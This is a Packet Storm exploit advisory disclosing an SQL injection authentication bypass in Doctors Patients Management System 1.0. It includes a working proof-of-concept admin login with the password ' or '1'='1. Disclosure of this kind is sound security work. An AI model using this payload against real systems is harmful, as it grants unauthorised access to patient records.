Doctors Patients Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
173a1c278f99a012b4fd9bd0e7df68b3ca8c340b947fbdcc8f342ed5a714fd07# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
http://test.com/PATH/signin
# Username : anything
# Password : ' or '1'='1
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed